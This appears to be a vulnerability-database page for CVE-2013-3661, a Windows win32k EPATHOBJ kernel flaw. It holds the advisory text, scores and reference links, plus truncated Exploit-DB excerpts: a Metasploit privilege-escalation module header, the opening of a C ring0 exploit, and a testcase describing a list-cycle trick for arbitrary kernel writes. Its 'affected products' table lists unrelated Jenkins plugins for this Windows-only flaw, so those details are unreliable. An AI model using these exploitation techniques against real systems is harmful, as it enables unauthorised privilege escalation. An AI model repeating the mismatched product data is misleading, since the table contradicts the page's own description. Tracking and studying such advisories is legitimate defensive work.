CVE-2013-3661
published 2013-05-24CVE-2013-3661: The EPATHOBJ::bFlatten function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2…
PriorityP428medium4.9CVSS 2.0
AVLACLAuNCNINAC
EXPLOIT
EPSS
3.85%
88.8th percentile
The EPATHOBJ::bFlatten function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not check whether linked-list traversal is continually accessing the same list member, which allows local users to cause a denial of service (infinite traversal) via vectors that trigger a crafted PATHRECORD chain.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jenkins | certain_pages_in_monitoring_plugin | — | — |
| jenkins | jenkins_core | — | — |
| jenkins | monitoring_plugin | — | — |
| jenkins | user_of_monitoring_plugin | — | — |
| microsoft | windows_server_2008 | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows - 'EPATHOBJ::pprFlattenRec' Local Privilege Escalation (Metasploit)
exploitdb·2013-07-02
CVE-2013-3661 Microsoft Windows - 'EPATHOBJ::pprFlattenRec' Local Privilege Escalation (Metasploit)
Microsoft Windows - 'EPATHOBJ::pprFlattenRec' Local Privilege Escalation (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/process'
class Metasploit3 'Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage
of uninitialized data which allows to corrupt memory. At the moment, the module has
been tested successfully on Windows XP SP3, Windows 2003 SP1, a
Exploit-DB
Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - 'EPATHOBJ' Local Ring
exploitdb·2013-06-03
CVE-2013-3661 Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - 'EPATHOBJ' Local Ring
Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - 'EPATHOBJ' Local Ring
---
#ifndef WIN32_NO_STATUS
# define WIN32_NO_STATUS
#endif
#include
#include
#include
#include
#include
#ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS
#endif
#include
#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")
#pragma comment(lib, "shell32")
#pragma comment(linker, "/SECTION:.text,ERW")
#ifndef PAGE_SIZE
# define PAGE_SIZE 0x1000
#endif
#define MAX_POLYPOINTS (8192 * 3)
#define MAX_REGIONS 8192
#define CYCLE_TIMEOUT 10000
//
// --------------------------------------------------
// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
// ----------------------------------------- taviso () cmpxchg8b com -----
//
// INTRODUCTION
//
// There's a pretty ob
Exploit-DB
Microsoft Windows - Win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase
exploitdb·2013-05-21
CVE-2013-3661 Microsoft Windows - Win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase
Microsoft Windows - Win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase
---
I'm quite proud of this list cycle trick, here's how to turn it into an
arbitrary write.
First, we create a watchdog thread that will patch the list atomically
when we're ready. This is needed because we can't exploit the bug while
HeavyAllocPool is failing, because of the early exit in pprFlattenRec:
.text:BFA122B8 call newpathrec ; EPATHOBJ::newpathrec(_PATHRECORD * *,ulong *,ulong)
.text:BFA122BD cmp eax, 1 ; Check for failure
.text:BFA122C0 jz short continue
.text:BFA122C2 xor eax, eax ; Exit early
.text:BFA122C4 jmp early_exit
So we create a list node like this:
PathRecord->Next = PathRecord;
PathRecord->Flags = 0;
Then EPATHOBJ::bFlatten() spins forever doing nothing:
BOOL __thiscall EP
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2013-05/0094.htmlhttp://archives.neohapsis.com/archives/fulldisclosure/2013-06/0006.htmlhttp://secunia.com/advisories/53435http://twitter.com/taviso/statuses/335557286657400832http://www.computerworld.com/s/article/9239477http://www.exploit-db.com/exploits/25611/http://www.osvdb.org/93539http://www.reddit.com/r/netsec/comments/1eqh66/0day_windows_kernel_epathobj_vulnerability/http://www.theverge.com/2013/5/23/4358400/google-engineer-bashes-microsoft-discloses-windows-flawhttp://archives.neohapsis.com/archives/fulldisclosure/2013-05/0094.htmlhttp://archives.neohapsis.com/archives/fulldisclosure/2013-06/0006.htmlhttp://secunia.com/advisories/53435http://twitter.com/taviso/statuses/335557286657400832http://www.computerworld.com/s/article/9239477http://www.exploit-db.com/exploits/25611/http://www.osvdb.org/93539http://www.reddit.com/r/netsec/comments/1eqh66/0day_windows_kernel_epathobj_vulnerability/http://www.theverge.com/2013/5/23/4358400/google-engineer-bashes-microsoft-discloses-windows-flaw
2013-05-24
Published